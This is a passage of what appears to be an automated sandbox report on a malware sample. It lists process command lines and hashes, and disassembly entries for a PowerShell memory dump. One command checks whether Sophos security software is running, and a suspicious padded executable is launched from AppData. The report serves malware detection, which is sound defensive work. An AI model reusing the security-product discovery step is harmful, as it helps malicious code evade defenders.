                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:02:57:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                  Imagebase:0x7ff7a3a70000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:02:57:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:35
                                                                                                                  Start time:02:57:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                  Imagebase:0x7ff6e2250000
                                                                                                                  File size:106'496 bytes
                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:36
                                                                                                                  Start time:02:57:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:find /I "sophoshealth.exe"
                                                                                                                  Imagebase:0x7ff79ffa0000
                                                                                                                  File size:17'920 bytes
                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:37
                                                                                                                  Start time:02:57:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:846'325'235 bytes
                                                                                                                  MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 077618E0 Relevance: 8.2, Strings: 6, Instructions: 703COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                                                                    • API String ID: 0-471056614
                                                                                                                    • Opcode ID: 5c05ec7b3ea43d6d325d5e9c744479fd70e619dc6d908785e1d5029ba5d8b8dc
                                                                                                                    • Instruction ID: 5a00cd9de602a606e281c7dd929cfad66f57611b2eb6d3a8fced526713f733fe
                                                                                                                    • Opcode Fuzzy Hash: 5c05ec7b3ea43d6d325d5e9c744479fd70e619dc6d908785e1d5029ba5d8b8dc
                                                                                                                    • Instruction Fuzzy Hash: 20329DB57043098FC7258B68881D7BABBE6AFC2391F5488BADD05CB255DB35CC41C7A2
                                                                                                                    Function 03042F58 Relevance: .5, Instructions: 495COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52fcf73f23759b0b0d80f317e62c7180ffa9f978e26e4d8b94a231e04a053046
                                                                                                                    • Instruction ID: d08cbb262b7cbbf30094b3aba53747030c4e01fccb58c4274ffbc487b0bb231a
                                                                                                                    • Opcode Fuzzy Hash: 52fcf73f23759b0b0d80f317e62c7180ffa9f978e26e4d8b94a231e04a053046
                                                                                                                    • Instruction Fuzzy Hash: 8F226E74A012499FCB05CF98C594AAEFBF1FF48310F2885A9E845AB365C735EE51CB90
                                                                                                                    Function 030448E0 Relevance: .3, Instructions: 330COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c08dd4bc8f07a07fada40583fe1f0d6b9e06689fd1717f2f5426294754efdd16
                                                                                                                    • Instruction ID: 63680288ea6b769e1e84a790c073130c32cbda5ab95d88c44d02a5ee384d7e16
                                                                                                                    • Opcode Fuzzy Hash: c08dd4bc8f07a07fada40583fe1f0d6b9e06689fd1717f2f5426294754efdd16
                                                                                                                    • Instruction Fuzzy Hash: C2D15C74E052489FCB05CFA9D480A9DFBF2AF49310F2981A6E805AB362C735ED45CB90
                                                                                                                    Function 07761A54 Relevance: .1, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fb53f77e60c5736ff5e1d41a5f1362e61de57ef24d29b4529e56455aea187675
                                                                                                                    • Instruction ID: 180d882b49c474e60351d721e6cf061c49bafb522c720c60573ba390e121b9d1
                                                                                                                    • Opcode Fuzzy Hash: fb53f77e60c5736ff5e1d41a5f1362e61de57ef24d29b4529e56455aea187675
                                                                                                                    • Instruction Fuzzy Hash: C84119F5A0430ADFCB248A64C54DB6A7BA2AF823D4F848495DC04DB659D735DC81C7E2
                                                                                                                    Function 030433D0 Relevance: .1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 229b19d67bddec13d25a4c2884d7a690b0d7decaeb0929614d857fa91fa88050
                                                                                                                    • Instruction ID: 84e4b6a9389840fb85cb623d3f3407c000217cf6739b48458d076deda59bab87
                                                                                                                    • Opcode Fuzzy Hash: 229b19d67bddec13d25a4c2884d7a690b0d7decaeb0929614d857fa91fa88050
                                                                                                                    • Instruction Fuzzy Hash: 7A4148B4A015059FCB0ACF98C5D49AAFBB1FF48310B1581A9D915AB364C732FE60CFA0
                                                                                                                    Function 030433E0 Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 60cd9fa48cc0c026bff45c917e48a4153960b5df728a8c8b3e79df6c6c431900
                                                                                                                    • Instruction ID: 7536ec0d5224306bcb84aa1eb1b1ba811f4b099bfd9b61a04dc24e4d3de09b9d
                                                                                                                    • Opcode Fuzzy Hash: 60cd9fa48cc0c026bff45c917e48a4153960b5df728a8c8b3e79df6c6c431900
                                                                                                                    • Instruction Fuzzy Hash: 704127B4A015059FCB0ACF98C1949AAFBB1FF48310B1591A9D915AB364C732FDA0CFA0
                                                                                                                    Function 03042A90 Relevance: .1, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4383d5fff2f798668111efe7f4ae5be7a48da8137138f3cc55ef81dfedf52235
                                                                                                                    • Instruction ID: afddb8943b4c94af6443f0ab26ca5fd2c13651d6932ec0d034bd771b05c02c76
                                                                                                                    • Opcode Fuzzy Hash: 4383d5fff2f798668111efe7f4ae5be7a48da8137138f3cc55ef81dfedf52235
                                                                                                                    • Instruction Fuzzy Hash: C031CFB0A052198FCB01CF5CC8809AAFBF4FF49310B1485AAE849EB752C730ED55CBA0
                                                                                                                    Function 03042A80 Relevance: .1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 13848eb955789c9b689c66ed9a766e3ef2d751e92a0ef046d1f44a3b3085a032
                                                                                                                    • Instruction ID: 925ddbf36c9118d8eb9f496c604b34281361cd661c51c69f2bad5e65c2d6800c
                                                                                                                    • Opcode Fuzzy Hash: 13848eb955789c9b689c66ed9a766e3ef2d751e92a0ef046d1f44a3b3085a032
                                                                                                                    • Instruction Fuzzy Hash: DA2127B4A006059FCB00CF98C9809AAFBF5FF4D310B1485A5E809EB361C731ED52CBA0
                                                                                                                    Function 030448D0 Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2598149516.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_3040000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 210c736cd98e1505380cebae6b30c45f2c6bbf1ea672c1f17ee6ce47a8550300
                                                                                                                    • Instruction ID: 997d697c5ba3a943e7e41e1d656b1cbcef8fec0531f0c37529711e9a505d19be
                                                                                                                    • Opcode Fuzzy Hash: 210c736cd98e1505380cebae6b30c45f2c6bbf1ea672c1f17ee6ce47a8550300
                                                                                                                    • Instruction Fuzzy Hash: 2B216DB4A05209CFCB00CF99C8809AEFBF1FF89310B1584A9D945AB351C331ED41CBA1
                                                                                                                    Function 02F1D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2597818897.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_2f1d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ad70c6acb39f2afda9730be55a0386ba040ca67e230419d5a26fa924c9a00ae
                                                                                                                    • Instruction ID: 705b12ec9d571e9c7109d80e65cc4f01b9bbcc44ec71f2176e06e03ea3817888
                                                                                                                    • Opcode Fuzzy Hash: 9ad70c6acb39f2afda9730be55a0386ba040ca67e230419d5a26fa924c9a00ae
                                                                                                                    • Instruction Fuzzy Hash: 1801D0715053449DD7104A1ACDC4B57BFACDF45764F58C459DE484B14AC3799441C6B1
                                                                                                                    Function 02F1D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2597818897.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_2f1d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 57ac90f5b56ebfd53e81c3ace4b4f79f0dfe5856c844a8202d71c26eea70b353
                                                                                                                    • Instruction ID: c3668436abde392d5a34a11b843efe9e30030a1d9ad7091c29082bbada1b1f24
                                                                                                                    • Opcode Fuzzy Hash: 57ac90f5b56ebfd53e81c3ace4b4f79f0dfe5856c844a8202d71c26eea70b353
                                                                                                                    • Instruction Fuzzy Hash: 6F01406140E3C09ED7128B258894752BFB4DF47624F1D84DBD9888F1A7C2695849C772

                                                                                                                    Non-executed Functions

                                                                                                                    Function 077608A0 Relevance: 9.1, Strings: 7, Instructions: 321COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-108373575
                                                                                                                    • Opcode ID: d5f1a923fda18cb1431fe646f4517f1059d8f68fef92c442a1c8635c29dd9c5e
                                                                                                                    • Instruction ID: be02c73732ef80e8632f14d417af1473609304b365e36fb0d772b0fdbb303b03
                                                                                                                    • Opcode Fuzzy Hash: d5f1a923fda18cb1431fe646f4517f1059d8f68fef92c442a1c8635c29dd9c5e
                                                                                                                    • Instruction Fuzzy Hash: 92A16AB27043168FC7254A7C9814A7ABBE6EFC2690F1888BBDC45CB255DB36CC41C7A1
                                                                                                                    Function 077614E8 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-2353078639
                                                                                                                    • Opcode ID: 351d06fcd77e0216a47b9cb815d724318c316dfc96947bbc05a516f48bd34354
                                                                                                                    • Instruction ID: a7bd4d36ef24ee33869877065745e47ecc5c57d5708499d840bc0c44f8a4baa5
                                                                                                                    • Opcode Fuzzy Hash: 351d06fcd77e0216a47b9cb815d724318c316dfc96947bbc05a516f48bd34354
                                                                                                                    • Instruction Fuzzy Hash: 345167B570430E8FCB258A6D841C366BBF6AFC2255F98886BDC46CB25ADE35C841C791
                                                                                                                    Function 07761798 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tP]q$tP]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-1831577214
                                                                                                                    • Opcode ID: 217d89fd20e01ffe5b1155bb79e4060ea8435b00284eb25bb97e548a993a8edc
                                                                                                                    • Instruction ID: 14f5d4d69eb12e138102c209bf67b9303511e83c530a116be62d4f0a02fb4e40
                                                                                                                    • Opcode Fuzzy Hash: 217d89fd20e01ffe5b1155bb79e4060ea8435b00284eb25bb97e548a993a8edc
                                                                                                                    • Instruction Fuzzy Hash: 7F4139B270431A8FD7158B69D808666BBE5EFC2B70B6588ABDC44CB365CA31DC45C391
                                                                                                                    Function 07760570 Relevance: 6.3, Strings: 5, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$4']q$$]q$$]q
                                                                                                                    • API String ID: 0-451802133
                                                                                                                    • Opcode ID: 612a6b201ddea3fcf3df7f68b772057e8ab06378b5c9bfa118f0d3c0d6b9f84e
                                                                                                                    • Instruction ID: 4da7b48bbbc081a7366ba24898671c501e0e7ec468390d35ba99feacc3903e71
                                                                                                                    • Opcode Fuzzy Hash: 612a6b201ddea3fcf3df7f68b772057e8ab06378b5c9bfa118f0d3c0d6b9f84e
                                                                                                                    • Instruction Fuzzy Hash: 8201266174A3954FC73A026C2C24DA9AFB69FD359131A09D7C881CB29FCD098C05C3E7
                                                                                                                    Function 07763518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2603097736.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7760000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-858218434
                                                                                                                    • Opcode ID: 9c0b2894fbdbdc4b36cf6a8a93e8b188fa3be570e30625e453fc5876f218c02d
                                                                                                                    • Instruction ID: ff542667d90179b61e703b1cbe946997524ecf6b0da654d9afbe02b422f14f35
                                                                                                                    • Opcode Fuzzy Hash: 9c0b2894fbdbdc4b36cf6a8a93e8b188fa3be570e30625e453fc5876f218c02d
                                                                                                                    • Instruction Fuzzy Hash: 0D2149B13143165BDB28557E8844B23BEDA9BC0755F248C2AAC49CB38EDD35C845C361